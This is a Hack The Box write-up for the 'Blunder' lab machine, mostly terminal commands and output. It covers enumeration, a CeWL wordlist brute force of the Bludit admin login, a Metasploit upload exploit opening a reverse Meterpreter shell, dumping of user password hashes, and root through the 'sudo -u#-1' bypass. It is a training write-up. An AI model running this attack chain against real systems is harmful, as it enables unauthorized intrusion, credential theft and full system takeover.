Libertyunix
  • About.me
  • Getting Started
    • Kali Images
    • Setting Up Your Kali Box
  • CheetSheets
    • OSCP Fun
    • Active Directory
    • Windows
    • 802-11 Wireless
    • Enumeration
    • Payloads
    • Secure Copy Protocol
    • Privilege Escalation
    • Tunneling
    • Red Team Playbook
    • Oneliners for Code Execution
  • PenTesting & Red Teaming
    • Python for Exfil
    • Using MSBuild to Execute Shellcode in C#
    • Social Engineering Tricks
    • Setting Up Caldera & Atomic Red-Team
    • Discovering & Exploiting Buffer Overflows
  • Wireless
    • An Introduction to IoT Penetration Testing
    • An Introduction to BLE - Part 1
    • BLE Deep Dive
    • Proxmark 3
  • Hack The Box
    • Fuse
    • Blunder
    • Unblanced
    • Tabby
  • Threat Hunting
    • Threat Hunter Playbook
  • DFIR
    • Creating Windows USB for DFIR & Fun (DRAFT)
  • Talks, Workshops, & WriteUps
    • The Portable Executable (PE) (DRAFT)
    • Resume
    • Presented Research
    • Offensive Security 101 Workshop
Powered by GitBook
On this page

Last updated 4 years ago

Lets start with nmap

Next is Nikto - Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers:

Next we will enumerate some directories with Dirb - DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response

This allows us to quickly locate interesting directories such as admin portals:

We also find the find site. This site has a lot of words. I think this is a perfect time for CeWL.

After fuzzing with dirb i came across this information on /to.txt

I'm thinking that fergus might be a username. Also after doing a quick google I came across this exploit:

There are a couple of ruby requirements for this exploit so lets install them now.

Lets give this exploit a try:

With these creds we how have access to the admin portal. After googling "blundit admin portal exploit" I came across this article:

Looks like there is also a Metasploit moduleshell

Lets stablize this shell

Lets begin our enumeration both manually and automated. To automate we will use linenum.sh:

Grep the contents on the application looking for phrases such as auth, password, and key we come across this result for users.php

Lets user hash-identifier to see what we are dealing with here:

This hash can be cracked online. Let use the password to access the system with this user.

Lets locate the user flag now that we have access outside of our php shell.

We can check our sudo permission using sudo -l

After some googling we come across this exploit:

They don't come any easier than this. Looks like our privilege escalation require this one line of code - sudo -u#-1 /bin/bash

root@liberty:/home/kali# nmap blunder.htb
Starting Nmap 7.91 ( https://nmap.org ) 
Nmap scan report for blunder.htb (10.129.4.41)
Host is up (0.019s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE
21/tcp closed ftp
80/tcp open   http

Nmap done: 1 IP address (1 host up) scanned in 4.82 seconds
root@liberty:/home/kali# nmap -sV blunder.htb
Starting Nmap 7.91 ( https://nmap.org ) 
Nmap scan report for blunder.htb (10.129.4.41)
Host is up (0.015s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds
root@liberty:/home/kali# 
root@liberty:/home/kali# nikto -h blunder.htb
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.129.4.41
+ Target Hostname:    blunder.htb
+ Target Port:        80
+ Start Time:         2020-10-13 13:32:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: Bludit
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ "robots.txt" contains 1 entry which should be manually viewed.
root@liberty:~# cewl -d 5 -m 3 -w wordlist http://blunder.htb
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root@liberty:~# ls
Desktop  Documents  Downloads  htb  Music  Pictures  Public  Templates  Videos  wordlist
root@liberty:~# cat wordlist 
the
Load
Plugins
and
for
Include
Site
Page
has
About
King
with
USB
Begin
more
End
service
from
Stadia
Dynamic
...
-Inform fergus that the new blog needs images - PENDING
root@liberty:~/htb# gem install httpclient
Fetching httpclient-2.8.3.gem
Successfully installed httpclient-2.8.3
Parsing documentation for httpclient-2.8.3
Installing ri documentation for httpclient-2.8.3
Done installing documentation for httpclient after 0 seconds
1 gem installed
root@liberty:~/htb# gem install docopt
Fetching docopt-0.6.1.gem
Successfully installed docopt-0.6.1
Parsing documentation for docopt-0.6.1
Installing ri documentation for docopt-0.6.1
Done installing documentation for docopt after 0 seconds
1 gem installed
root@liberty:~/htb# 

root@liberty:~/htb# ruby blut-bf.rb -r http://blunder.htb/admin/ -u fergus -w ../wordlist 
[*] Trying password: the
[*] Trying password: Load
[*] Trying password: Plugins
[*] Trying password: and
[*] Trying password: for
[*] Trying password: Include
[*] Trying password: Site
[*] Trying password: Page
[*] Trying password: has
[*] Trying password: About
[*] Trying password: King
[*] Trying password: with
[*] Trying password: USB
[*] Trying password: Begin
...

[+] Password found: RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 10.10.14.45:4444 
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading ZTJkGHVYBh.png...
[*] Uploading .htaccess...
[*] Executing ZTJkGHVYBh.png...
[*] Sending stage (38288 bytes) to 10.129.4.41
[*] Meterpreter session 1 opened (10.10.14.45:4444 -> 10.129.4.41:59626) at 2020-10-13 16:08:49 -0400
[+] Deleted .htaccess

meterpreter > shell
Process 4834 created.
Channel 1 created.
whoami
www-data

python -c 'import pty;pty.spawn("/bin/bash")'
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$
root@liberty:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.4.41 - - [TBD] "GET /linenum.sh HTTP/1.1" 200
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Admin",
        "firstName": "Administrator",
        "lastName": "",
        "role": "admin",
        "password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
        "salt": "5dde2887e7aca",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""
    },
    "fergus": {
        "firstName": "",
        "lastName": "",
        "nickname": "",
        "description": "",
        "role": "author",
        "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
        "salt": "jqxpjfnv",
        "email": "",
        "registered": "2019-11-27 13:26:44",
        "tokenRemember": "",
        "tokenAuth": "0e8011811356c0c5bd2211cba8c50471",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "codepen": "",
        "instagram": "",
        "github": "",
        "gitlab": "",
        "linkedin": "",
        "mastodon": ""
    }
}www-data@blunder:/var/www/bludit-3.9.2/bl-content/databases$
root@liberty:~/htb# hash-identifier 
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: bfcc887f62e36ea019e3295aafb8a3885966e265

Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

www-data@blunder:/var/www/bludit-3.9.2/bl-content/databases$ su hugo su hugo Password: Password120
hugo@blunder:~$ ls
ls
Desktop    Downloads  Pictures  Templates  Videos
Documents  Music      Public    user.txt
hugo@blunder:~$ cat user.txt
cat user.txt
FLAG HERE
hugo@blunder:/var/www/bludit-3.9.2/bl-content/databases$ sudo -l
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
hugo@blunder:/var/www/bludit-3.9.2/bl-content/databases$
hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo# cat /root/root.txt
cat /root/root.txt
FLAG HERE
root@blunder:/home/hugo#
PreviousFuseNextUnblanced
  1. Hack The Box

Blunder

HTB Writer Up

LogoGitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation ChecksGitHub
Logosudo 1.8.27 - Security BypassExploit Database
LogoBludit Directory Traversal Image File Upload VulnerabilityRapid7
LogoBludit 3.9.12 - Directory TraversalExploit Database
LogoBludit 3.9.2 - Authentication Bruteforce Mitigation BypassExploit Database